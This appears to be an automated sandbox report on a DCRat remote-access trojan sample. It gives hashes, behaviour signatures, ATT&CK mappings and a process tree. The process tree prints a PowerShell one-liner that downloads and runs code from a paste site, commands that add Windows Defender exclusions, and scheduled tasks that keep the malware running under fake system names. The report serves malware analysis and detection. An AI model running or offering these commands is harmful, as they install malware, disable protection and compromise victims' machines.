dcrat | 688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028

Analysis

max time kernel
100s
max time network
140s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
08-01-2025 08:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spreadmalware.exe
Size

61KB
MD5

3437a2105a9740ad94b06f04378bb5b9
SHA1

80ca4ebff21e3a4962ccdec2853308ba544cdeb9
SHA256

688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028
SHA512

5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076
SSDEEP

1536:lF6AD4dXD7tlo9OlvBu/b2QDAOzJri76tF:qZdnty9ODu/b2Vexi7a

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4212	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1020	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3604	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3772	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4068	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2932	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1980	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3348	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1196	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2056	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3832	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4372	3392	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4132	3392	schtasks.exe	87

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/4916-3-0x000000001C0B0000-0x000000001C1B0000-memory.dmp	dcrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
23	3272	powershell.exe
24	3272	powershell.exe
26	3272	powershell.exe
33	1380	powershell.exe
35	1380	powershell.exe
36	1380	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2944	powershell.exe
4560	powershell.exe
1484	powershell.exe
2724	powershell.exe
4700	powershell.exe
2928	powershell.exe
3620	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	spreadmalware.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	sysmon.exe

Executes dropped EXE 1 IoCs

pid	Process
4596	sysmon.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Sidebar\dllhost.exe	spreadmalware.exe
File created	C:\Program Files (x86)\Windows Sidebar\5940a34987c991	spreadmalware.exe
File created	C:\Program Files\Google\Chrome\Application\sysmon.exe	spreadmalware.exe
File created	C:\Program Files\Google\Chrome\Application\121e5b5079f7c0	spreadmalware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\WinSxS\msil_microsoft.virtualiz..vmbrowser.resources_31bf3856ad364e35_10.0.19041.1_de-de_69cc74d0c16e7b6c\TextInputHost.exe	spreadmalware.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings	spreadmalware.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3604	schtasks.exe
5088	schtasks.exe
3772	schtasks.exe
2932	schtasks.exe
2788	schtasks.exe
1980	schtasks.exe
1196	schtasks.exe
4212	schtasks.exe
3832	schtasks.exe
1996	schtasks.exe
3348	schtasks.exe
2056	schtasks.exe
4132	schtasks.exe
1020	schtasks.exe
4372	schtasks.exe
4068	schtasks.exe
1776	schtasks.exe
2592	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
3272	powershell.exe
3272	powershell.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
4916	spreadmalware.exe
2928	powershell.exe
2928	powershell.exe
2944	powershell.exe
2944	powershell.exe
1484	powershell.exe
1484	powershell.exe
4700	powershell.exe
4700	powershell.exe
3620	powershell.exe
3620	powershell.exe
2928	powershell.exe
2724	powershell.exe
2724	powershell.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
2944	powershell.exe
4700	powershell.exe
1484	powershell.exe
3620	powershell.exe
2724	powershell.exe
4596	sysmon.exe
1380	powershell.exe
1380	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4916	spreadmalware.exe
Token: SeDebugPrivilege	3272	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeIncreaseQuotaPrivilege	2928	powershell.exe
Token: SeSecurityPrivilege	2928	powershell.exe
Token: SeTakeOwnershipPrivilege	2928	powershell.exe
Token: SeLoadDriverPrivilege	2928	powershell.exe
Token: SeSystemProfilePrivilege	2928	powershell.exe
Token: SeSystemtimePrivilege	2928	powershell.exe
Token: SeProfSingleProcessPrivilege	2928	powershell.exe
Token: SeIncBasePriorityPrivilege	2928	powershell.exe
Token: SeCreatePagefilePrivilege	2928	powershell.exe
Token: SeBackupPrivilege	2928	powershell.exe
Token: SeRestorePrivilege	2928	powershell.exe
Token: SeShutdownPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeSystemEnvironmentPrivilege	2928	powershell.exe
Token: SeRemoteShutdownPrivilege	2928	powershell.exe
Token: SeUndockPrivilege	2928	powershell.exe
Token: SeManageVolumePrivilege	2928	powershell.exe
Token: 33	2928	powershell.exe
Token: 34	2928	powershell.exe
Token: 35	2928	powershell.exe
Token: 36	2928	powershell.exe
Token: SeIncreaseQuotaPrivilege	4560	powershell.exe
Token: SeSecurityPrivilege	4560	powershell.exe
Token: SeTakeOwnershipPrivilege	4560	powershell.exe
Token: SeLoadDriverPrivilege	4560	powershell.exe
Token: SeSystemProfilePrivilege	4560	powershell.exe
Token: SeSystemtimePrivilege	4560	powershell.exe
Token: SeProfSingleProcessPrivilege	4560	powershell.exe
Token: SeIncBasePriorityPrivilege	4560	powershell.exe
Token: SeCreatePagefilePrivilege	4560	powershell.exe
Token: SeBackupPrivilege	4560	powershell.exe
Token: SeRestorePrivilege	4560	powershell.exe
Token: SeShutdownPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeSystemEnvironmentPrivilege	4560	powershell.exe
Token: SeRemoteShutdownPrivilege	4560	powershell.exe
Token: SeUndockPrivilege	4560	powershell.exe
Token: SeManageVolumePrivilege	4560	powershell.exe
Token: 33	4560	powershell.exe
Token: 34	4560	powershell.exe
Token: 35	4560	powershell.exe
Token: 36	4560	powershell.exe
Token: SeIncreaseQuotaPrivilege	2944	powershell.exe
Token: SeSecurityPrivilege	2944	powershell.exe
Token: SeTakeOwnershipPrivilege	2944	powershell.exe
Token: SeLoadDriverPrivilege	2944	powershell.exe
Token: SeSystemProfilePrivilege	2944	powershell.exe
Token: SeSystemtimePrivilege	2944	powershell.exe
Token: SeProfSingleProcessPrivilege	2944	powershell.exe
Token: SeIncBasePriorityPrivilege	2944	powershell.exe
Token: SeCreatePagefilePrivilege	2944	powershell.exe
Token: SeBackupPrivilege	2944	powershell.exe
Token: SeRestorePrivilege	2944	powershell.exe
Token: SeShutdownPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 4916 wrote to memory of 2972	4916	spreadmalware.exe	88
PID 4916 wrote to memory of 2972	4916	spreadmalware.exe	88
PID 2972 wrote to memory of 3272	2972	cmd.exe	90
PID 2972 wrote to memory of 3272	2972	cmd.exe	90
PID 4916 wrote to memory of 2944	4916	spreadmalware.exe	110
PID 4916 wrote to memory of 2944	4916	spreadmalware.exe	110
PID 4916 wrote to memory of 4560	4916	spreadmalware.exe	111
PID 4916 wrote to memory of 4560	4916	spreadmalware.exe	111
PID 4916 wrote to memory of 1484	4916	spreadmalware.exe	112
PID 4916 wrote to memory of 1484	4916	spreadmalware.exe	112
PID 4916 wrote to memory of 2724	4916	spreadmalware.exe	113
PID 4916 wrote to memory of 2724	4916	spreadmalware.exe	113
PID 4916 wrote to memory of 4700	4916	spreadmalware.exe	114
PID 4916 wrote to memory of 4700	4916	spreadmalware.exe	114
PID 4916 wrote to memory of 2928	4916	spreadmalware.exe	115
PID 4916 wrote to memory of 2928	4916	spreadmalware.exe	115
PID 4916 wrote to memory of 3620	4916	spreadmalware.exe	116
PID 4916 wrote to memory of 3620	4916	spreadmalware.exe	116
PID 4916 wrote to memory of 952	4916	spreadmalware.exe	124
PID 4916 wrote to memory of 952	4916	spreadmalware.exe	124
PID 952 wrote to memory of 4896	952	cmd.exe	126
PID 952 wrote to memory of 4896	952	cmd.exe	126
PID 3272 wrote to memory of 3852	3272	powershell.exe	130
PID 3272 wrote to memory of 3852	3272	powershell.exe	130
PID 3852 wrote to memory of 4112	3852	cmd.exe	132
PID 3852 wrote to memory of 4112	3852	cmd.exe	132
PID 3852 wrote to memory of 4788	3852	cmd.exe	133
PID 3852 wrote to memory of 4788	3852	cmd.exe	133
PID 3852 wrote to memory of 4084	3852	cmd.exe	134
PID 3852 wrote to memory of 4084	3852	cmd.exe	134
PID 952 wrote to memory of 4596	952	cmd.exe	135
PID 952 wrote to memory of 4596	952	cmd.exe	135
PID 4596 wrote to memory of 2976	4596	sysmon.exe	136
PID 4596 wrote to memory of 2976	4596	sysmon.exe	136
PID 2976 wrote to memory of 1380	2976	cmd.exe	138
PID 2976 wrote to memory of 1380	2976	cmd.exe	138
PID 1380 wrote to memory of 340	1380	powershell.exe	139
PID 1380 wrote to memory of 340	1380	powershell.exe	139
PID 340 wrote to memory of 3192	340	cmd.exe	141
PID 340 wrote to memory of 3192	340	cmd.exe	141
PID 340 wrote to memory of 2768	340	cmd.exe	142
PID 340 wrote to memory of 2768	340	cmd.exe	142
PID 340 wrote to memory of 3460	340	cmd.exe	143
PID 340 wrote to memory of 3460	340	cmd.exe	143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\spreadmalware.exe
"C:\Users\Admin\AppData\Local\Temp\spreadmalware.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3852
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        5⤵
        
        PID:4112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        5⤵
        
        PID:4788
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        5⤵
        
        PID:4084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spreadmalware.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Start Menu\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\sysmon.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\StartMenuExperienceHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\RuntimeBroker.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\OfficeClickToRun.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3620
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MFoRFtMRMp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:4896
- - C:\Program Files\Google\Chrome\Application\sysmon.exe
    "C:\Program Files\Google\Chrome\Application\sysmon.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:340
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        7⤵
        
        PID:3192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        7⤵
        
        PID:2768
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        7⤵
        
        PID:3460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Sidebar\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Sidebar\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Start Menu\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\Start Menu\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Start Menu\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Program Files\Google\Chrome\Application\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default User\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\sysmon.exe

Filesize
61KB

MD5
3437a2105a9740ad94b06f04378bb5b9

SHA1
80ca4ebff21e3a4962ccdec2853308ba544cdeb9

SHA256
688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028

SHA512
5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83d94e8aa23c7ad2db6f972739506306

SHA1
bd6d73d0417971c0077f772352d2f538a6201024

SHA256
dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881

SHA512
4224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e3e5d9ed731e8f9026808921e0b1cac3

SHA1
bf6c9edda54230c27871807ff495e8145bb635f1

SHA256
134228b0b283fff4d3fc30924236db42dd4a978287a83c2f05f82982ca056283

SHA512
5420fff24379e9b4e3374879ecc20421c99b1529b62c461a273d16ef64007ab61c69d9cd25ee83cb9d097fb21e32cf871c4cd184e1d239bd03f71fd1944535ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\MFoRFtMRMp.bat

Filesize
218B

MD5
aa28f1eee3b705dc7290ec5e71c1b481

SHA1
8b478e5ded011a48cd9befd7f2c973a50e5aba9a

SHA256
3425b102abbecc9dec9120b63a97f395776588d57d3230bec707fb34396b7be6

SHA512
9a3481b2a8009867ea7c41d88967e0e0d173c78b3fa1693f43220a4ef9cc989a370d9cb16f1a7eedc16ab967adab9980eea1e24a620b187b2b10171385fc2f8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpf4bq0p.gq5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFyooc.bat

Filesize
171B

MD5
e733285e71b4a9f5b4d8621db7df6982

SHA1
a7a315bd04e7115a3e7a488c1faee47480281f47

SHA256
31aa232fe84f449546d9e24f048098a33e7319e361eb9e7d2fec542612a26c46

SHA512
d39d21d62ede4d13aa0544ecacdd48ecc94755ed713eca490b6bd6e3d6961c61cb7873ed382716bf5178eba7139366e8ea6deb84ad2fde0630b98f78578a46ba

Download Submit
C:\Users\Admin\AppData\Roaming\runtime.bat

Filesize
104KB

MD5
8158350247e35657cbccf5054d8a6d33

SHA1
b2cbd3a164a21d168b281a43646a08f4717539af

SHA256
8d4934d75e3a578b2e836507ae1fd02fa67e33c79f5a784c2ead91fecc2fb8f0

SHA512
f772a497baaf2f73b4fa2565abc7e536ce1d505c51271646532662d89f1ee34ad593ffaebc99d67f343e4973268efea7b8bf6cd9f274c4266278fc0e71b04aff

Download Submit
memory/3272-22-0x000001AAD6D10000-0x000001AAD74B6000-memory.dmp

Filesize
7.6MB

Download
memory/3272-9-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
10.8MB

Download
memory/3272-126-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
10.8MB

Download
memory/3272-7-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
10.8MB

Download
memory/3272-11-0x000001AAD5F50000-0x000001AAD5F72000-memory.dmp

Filesize
136KB

Download
memory/3272-10-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
